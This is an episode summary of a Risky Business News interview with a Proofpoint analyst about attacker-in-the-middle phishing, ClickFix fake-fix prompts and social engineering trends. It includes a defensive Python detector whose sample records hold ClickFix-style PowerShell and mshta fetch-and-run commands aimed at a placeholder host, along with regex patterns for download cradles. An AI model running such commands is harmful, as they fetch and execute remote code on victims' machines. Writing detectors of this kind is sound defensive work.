Risky Business News - Episode Summary
Title: Sponsored: Proofpoint on the Rise of ClickFix Attacks
Host: Catalin Cimpanu
Guest: Selena Larson, Senior Threat Intelligence Analyst at Proofpoint
Release Date: December 8, 2024
Introduction
In this episode of Risky Business News, host Catalin Cimpanu talks with Selena Larson, a Senior Threat Intelligence Analyst at Proofpoint. Sponsored by Proofpoint, the conversation covers the evolving landscape of phishing attacks, with a particular focus on the rise of the ClickFix technique and its broader implications for defenders.
Attacker-in-the-Middle Phishing
The episode opens with a look at attacker-in-the-middle phishing, a method in which threat actors place themselves between the user and the real login page so they can capture credentials and the resulting session. Catalin references a prior discussion with Jacques Louw from Push Security on similar topics, setting the stage for a more detailed analysis.
Selena Larson emphasizes the prevalence of this threat, stating, “[01:04] Yeah, it is very prevalent. We see a lot of it in email threat data.” She explains the two main types: reverse proxies and relays. Reverse proxies rewrite the legitimate site in real time to harvest information, while relays interact with the login portal on the backend. Kits such as Mamba and Tycoon, along with frameworks like EvilProxy and Evilginx, are highlighted as common tools cybercriminals use to run these attacks.
Larson notes, “[01:04]... most phishing as a service solutions are capable of defeating these MFA controls,” underscoring the adaptability of attackers in overcoming security measures like Multi-Factor Authentication (MFA).
Monetization of Stolen Credentials
Catalin raises the question of how stolen credentials are monetized, asking whether data from attacker-in-the-middle phishing ends up in credential shops. He observes, “[02:51]... most of the stuff on credential stores actually comes from info stealers.”
Larson responds, “[03:19] So we've actually never done that. Proofpoint doesn't really monitor the sort of leak sites...,” indicating that while Proofpoint tracks phishing kits and the information they target, it does not specifically monitor credential leakage on resale platforms. She elaborates on the difficulty of monetizing MFA tokens, which are short-lived, in contrast with more durable data like usernames and passwords.
However, Larson acknowledges the potential for stolen credentials to facilitate a variety of malicious activities, including business email compromise (BEC) and network access: “[03:31]... usernames and passwords could be sold and used... everything from follow on phishing to gain further access to a network...”
Rise of ClickFix Attacks
The conversation shifts to a rising trend in threat intelligence: ClickFix attacks. Catalin introduces the topic, and Larson provides an overview.
Selena Larson describes ClickFix as a social engineering technique that employs fake dialogue boxes mimicking legitimate error messages or fix prompts. These prompts instruct the user to copy a malicious PowerShell command and run it themselves, which installs malware. She explains, “[05:57] Essentially, it is a social engineering technique that uses these dialogue boxes... trick people into copying, pasting, and running malicious content on their computer.”
Larson highlights the simplicity and effectiveness of ClickFix, noting its prevalence across various threat actors. She cites the rapid adoption following its public release, “[05:57]... when this tool was released back in mid September, we started seeing it in email threat data just days later.” This underscores the technique’s adaptability and appeal within the cybercriminal community.
Defense Strategies Against ClickFix
Addressing defense mechanisms, Catalin suggests limiting PowerShell execution to mitigate ClickFix threats. Larson concurs, emphasizing a layered defense:
“[08:31] ...restricting access and execution of PowerShell on hosts can definitely prevent this.”
She further advocates user awareness and training, pointing out that informed users are less likely to fall for this kind of social engineering. Larson notes that the prompts are convincing precisely because they resemble genuine system messages: “[08:31]... having users be aware of this... these dialogue boxes look very legitimate.”
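Because ClickFix relies on the user pasting a command into the Run dialog, the resulting process tree is distinctive: an interpreter started by explorer.exe with a hidden window and a download cradle. The following detector is an added example (not Proofpoint's code or anything from the episode) that scores constructed process-creation records for that pattern; the field names and sample records are assumptions for the demo.

```python
"""Score process-creation events for the ClickFix paste-and-run pattern.
Added example; log records below are constructed, not real telemetry."""
import re

# Constructed records in a Sysmon Event ID 1 / Security 4688 style.
SAMPLE_EVENTS = [
    {"ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": 'powershell -w hidden -ep bypass -c "iex (iwr http://example.invalid/fix.txt)"'},
    {"ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\mshta.exe",
     "CommandLine": "mshta http://example.invalid/verify.hta"},
    {"ParentImage": r"C:\Program Files\Microsoft VS Code\Code.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "powershell -File build.ps1"},   # benign developer activity
]

INTERPRETERS = ("powershell.exe", "pwsh.exe", "mshta.exe", "cmd.exe")
RUN_DIALOG_PARENTS = ("explorer.exe",)   # Win+R launches children under explorer.exe

# Each regex is one command-line indicator; several together form the ClickFix shape.
INDICATORS = {
    "hidden_window": re.compile(r"-w(?:indowstyle)?\s+hidden", re.I),
    "policy_bypass": re.compile(r"-e(?:xecutionpolicy)?p?\s+bypass", re.I),
    "download_cradle": re.compile(r"\b(?:iwr|invoke-webrequest|invoke-expression|iex|mshta)\b", re.I),
    "encoded_command": re.compile(r"-e(?:nc|ncodedcommand)?\s+[A-Za-z0-9+/=]{20,}", re.I),
    "remote_url": re.compile(r"https?://", re.I),
}


def score_event(ev):
    """Return (score, matched indicator names) for one process-creation record."""
    image = ev["Image"].rsplit("\\", 1)[-1].lower()
    parent = ev["ParentImage"].rsplit("\\", 1)[-1].lower()
    if image not in INTERPRETERS:
        return 0, []
    hits = [name for name, rx in INDICATORS.items() if rx.search(ev["CommandLine"])]
    score = len(hits)
    # An interpreter spawned by the shell itself (Run dialog), not by an application,
    # is the key ClickFix signal, so it outweighs any single command-line token.
    if parent in RUN_DIALOG_PARENTS:
        hits.append("spawned_from_explorer")
        score += 2
    return score, hits


def find_clickfix(events, threshold=3):
    """Return (score, indicators, command line) for events at or above the threshold."""
    flagged = []
    for ev in events:
        score, hits = score_event(ev)
        if score >= threshold:
            flagged.append((score, hits, ev["CommandLine"]))
    return flagged
```

On the constructed records the two explorer.exe-spawned commands are flagged and the developer's `-File build.ps1` run is not; in production the same logic maps onto a SIEM rule over process-creation telemetry.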
Origins and Evolution of ClickFix
Catalin asks about the origins of the ClickFix technique, and Larson describes it as an evolution of threat actor tactics in response to stronger security controls like MFA.
“[09:28] I feel like the click fix technique is an evolution of tactics that we're seeing from threat actors... being very creative and trying new ways to infect users.”
Larson illustrates how threat actors continuously adapt, moving from MFA bypassing to leveraging social engineering methods that grant users a false sense of control, ultimately leading to malware installation.
She also mentions the diverse adoption of ClickFix across various threat levels, including Advanced Persistent Threats (APTs) like APT28, showcasing its broad applicability and effectiveness.
Shift Towards Enhanced Social Engineering
The discussion transitions to a broader shift in cyberattack strategies, moving from traditional methods to more sophisticated social engineering and human-centric interactions.
Catalin posits, “[11:13] So you could see a possible shift towards more social engineering and human interaction compared to classic... That’s basically the future, right?”
Larson agrees, highlighting the trend towards building trust and engaging users in conversation before deploying malicious payloads. She explains, “[11:23] ... threat actors reach out, have a conversation with somebody... building up a little bit of trust increases the likelihood of interaction on malicious applications.”
Examples include tailored phishing attempts that mimic non-threatening interactions, such as job offer emails that only later introduce malicious elements: “[12:10] Especially the Iranians... [12:12] ... TA4557 is a threat actor that delivers More_eggs. They send benign emails about a potential job...”
This strategy reflects a more psychologically nuanced approach, making attacks harder to detect and more convincing.
Conclusion
The episode wraps up with Larson reiterating the importance of adaptability in cybersecurity defenses and the need for continuous user education. The conversation underscores the dynamic nature of cyber threats, emphasizing that as defenses evolve, so too do the tactics of threat actors.
Catalin Cimpanu closes the interview, “[13:02] I think it's a great way to end it. Thank you very much.”
Catalin Cimpanu and Selena Larson exchange final remarks, highlighting the need for vigilance and proactive measures against social engineering techniques like ClickFix.
Notable Quotes:
- Selena Larson [01:04]: “Yeah, it is very prevalent. We see a lot of it in email threat data.”
- Larson [05:57]: “Essentially, it is a social engineering technique that uses these dialogue boxes... trick people into copying, pasting, and running malicious content on their computer.”
- Larson [08:31]: “Restricting access and execution of PowerShell on hosts can definitely prevent this.”
- Larson [09:28]: “I feel like the click fix technique is an evolution of tactics that we're seeing from threat actors... being very creative and trying new ways to infect users.”
- Larson [11:23]: “Threat actors reach out, have a conversation with somebody... building up a little bit of trust increases the likelihood of interaction on malicious applications.”
- Larson [12:12]: “TA4557 is a threat actor that delivers More_eggs. They send benign emails about a potential job...”
Key Takeaways
- Attacker-in-the-Middle Phishing is highly prevalent, utilizing reverse proxies and relays to bypass MFA controls.
- ClickFix attacks represent a significant rise in social engineering tactics, leveraging fake fix prompts to deliver malware via PowerShell.
- Defensive strategies should include restricting PowerShell execution and enhancing user awareness through training.
- There is a notable shift towards more sophisticated social engineering and human-centric attack methods, necessitating adaptive defenses.
For those interested in the latest cybersecurity threats and defense strategies, this episode of Risky Business News offers invaluable insights from a leading expert in the field.
